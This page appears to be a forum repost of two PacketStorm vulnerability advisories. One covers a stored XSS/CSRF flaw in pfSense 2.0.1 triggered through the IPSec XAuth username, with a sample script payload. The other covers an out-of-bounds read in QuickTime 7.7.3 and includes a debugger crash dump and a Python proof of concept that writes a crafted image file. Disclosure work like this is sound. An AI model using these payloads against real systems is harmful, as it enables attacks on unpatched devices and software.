    PFsense UTM Platform version 2.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities. ??????????????????????????????????????????????????????????????????????????????? ? Exploit Title: pfSense <= 2.0.1 XSS & CSRF during IPSec XAuth authentication ? Date: 04/01/2013 ? Author: Dimitris Strevinas ? Vendor or Software Link: www.pfsense.org ? Version: <= 2.0.1 ? Category: Semi-Persistent XSS & CSRF ? Google dork: ? Tested on: FreeBSD ??????????????????????????????????????????????????????????????????????????????? pfSense UTM distribution description ?????????????????????????????????????? pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus. [source: www.pfsense.org] The IPSec VPN functionality on pfSense is implemented using the Racoon vpn concentrator software. Vulnerability Summary ???????????????????????? pfSense versions 2.0.1 and prior are vulnerable to semi-persistent XSS and CSRF attack vectors, exploited by sending Javascript/HTML code as a username during the XAuth user authentication phase. XAUTH provides extended authentication for IPSec telecommuters by using authentication schemes such as RADIUS or internal user databases. [source: www.ciscopress.org] The vulnarability lies in diag_logs_ipsec.php which does not properly escape HTML characters in the Racoon log files. It is assumed that the attacker has successfully completed IPSEC Phase 1 and Phase 2 based on one of the following schemes: . Mutual RSA . Mutual PSK . Hybrid RSA It should also be noted that newer pfSense version use CSRF-magic on the majority of Web GUI forms, thus the CSRF exploitation likelihood is minimized at least in the standard installation. Exploit Path ??????????????? 1) Perform the Phase 1 and Phase 2 using a VPN Client and known credentials/certificates 2) During the XAuth provide a username like "><script>alert("XSS")</script> and a random password 3) The reflection of the XSS/CSRF is in the logs under Status > System Logs > IPSec The XSS "time-to-live" depends on the Racoon logging verbosity, max number of log lines and vpn activity. Nevertheless, it can be resubmitted to be shown again on top. Solution ??????????? Patch available by vendor, streamlined to 2.1 URL: http://redmine.pfsense.org/projects/pfsense-tools/repository/revisions/0675bde3039a94ee2cadc360875095b797af018f Credits & Contact ???????????????????? Dimitris Strevinas Obrela Security Industries CONTACT: www.obrela.com Source: PacketStorm
  25. Praetorian503
    Apple QuickTime Player Windows version 7.7.3 suffers from an out of bounds read vulnerability. # Title: Apple Quick Time Player (Windows)Version 7.7.3 Out of Bound Read # Date: 28th January,2013 # Author: Debasish Mandal (https://twitter.com/debasishm89) # Blog : http://www.debasish.in/ # Vendor Homepage: http://www.apple.com/ # Software Link: http://www.apple.com/quicktime/download/ # Version: Apple Quick Time version 7.7.3 # Tested on: Windows XP SP2 / Windows 7 ''' [+] Summary: A memory out of bound read issue exists in Apple Quick Time Player v7.7.3 which can be triggered while trying to open a specially crafted "qtif" image file using Quick Time Player/Quick time Picture Viewer or Quick Time Browser Plug-in. If successful, a malicious third party could trigger an invalid memory access, leading to a crash of the process. [+] Affected Module : QuickTime.qts [+] Crash Point: Faulting Instruction: QuickTime!LIST_ComponentDispatch+0x15ffd3: 66a1a4e3 8b0c06 mov ecx,dword ptr [esi+eax] ds:0023:42531f20=???????? 0:000> r eax=41414198 ebx=58580000 ecx=414141a0 edx=58585858 esi=0111dd88 edi=41414198 eip=66a1a4e3 esp=0012f324 ebp=42424242 iopl=0 nv up ei ng nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00210293 QuickTime!LIST_ComponentDispatch+0x15ffd3: 66a1a4e3 8b0c06 mov ecx,dword ptr [esi+eax] ds:0023:42531f20=???????? [+] Buggy Code:(Code from C:\Program Files\QuickTime\QTSystem\QuickTime.qts) 66A1A4E1 77 70 JA SHORT QuickTim.66A1A553 66A1A4E3 8B0C06 MOV ECX,DWORD PTR DS:[ESI+EAX] 66A1A4E6 0FB65406 03 MOVZX EDX,BYTE PTR DS:[ESI+EAX+3] 66A1A4EB 894C24 14 MOV DWORD PTR SS:[ESP+14],ECX 66A1A4EF 8A7424 16 MOV DH,BYTE PTR SS:[ESP+16] 66A1A4F3 8BF9 MOV EDI,ECX 66A1A4F5 C1E7 10 SHL EDI,10 66A1A4F8 81E1 00FF0000 AND ECX,0FF00 66A1A4FE 0BF9 OR EDI,ECX 66A1A500 C1E7 08 SHL EDI,8 66A1A503 0BD7 OR EDX,EDI 66A1A505 8BCA MOV ECX,EDX 66A1A507 7E 4A JLE SHORT QuickTim.66A1A553 66A1A509 8D3C01 LEA EDI,DWORD PTR DS:[ECX+EAX] 66A1A50C 3BEF CMP EBP,EDI 66A1A50E 72 43 JB SHORT QuickTim.66A1A553 66A1A510 3BF8 CMP EDI,EAX 66A1A512 72 3F JB SHORT QuickTim.66A1A553 66A1A514 8B4C06 04 MOV ECX,DWORD PTR DS:[ESI+EAX+4] 66A1A518 0FB65406 07 MOVZX EDX,BYTE PTR DS:[ESI+EAX+7] 66A1A51D 894C24 14 MOV DWORD PTR SS:[ESP+14],ECX 66A1A521 8A7424 16 MOV DH,BYTE PTR SS:[ESP+16] 66A1A525 8BD9 MOV EBX,ECX 66A1A527 C1E3 10 SHL EBX,10 66A1A52A 81E1 00FF0000 AND ECX,0FF00 66A1A530 0BD9 OR EBX,ECX 66A1A532 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18] 66A1A536 C1E3 08 SHL EBX,8 66A1A539 0BD3 OR EDX,EBX 66A1A53B 3BD1 CMP EDX,ECX 66A1A53D 74 04 JE SHORT QuickTim.66A1A543 66A1A53F 85C9 TEST ECX,ECX 66A1A541 75 07 JNZ SHORT QuickTim.66A1A54A 66A1A543 836C24 1C 01 SUB DWORD PTR SS:[ESP+1C],1 66A1A548 74 0B JE SHORT QuickTim.66A1A555 66A1A54A 8BC7 MOV EAX,EDI 66A1A54C 8D48 08 LEA ECX,DWORD PTR DS:[EAX+8] 66A1A54F 3BCD CMP ECX,EBP 66A1A551 ^76 90 JBE SHORT QuickTim.66A1A4E3 66A1A553 33C0 XOR EAX,EAX [+] Proof of Concept : ''' # /usr/bin/python buff = "" buff += "\x00\x00\x48\x79\x69\x64\x61\x74" buff += "\x5A"*18545 #Junks buff += "\x00\x00\x00\x6E\x69\x64\x73\x63" #nidsc header buff += "\x42\x42\x42\x42" buff += "\x5A"*82 #Junk buff += "\x41"*3 buff += "\x42" buff += "\x58\x58\x58\x58" f = open('buggy.qtif','w') f.write(buff) f.close() Source: PacketStorm
×
×
  • Create New...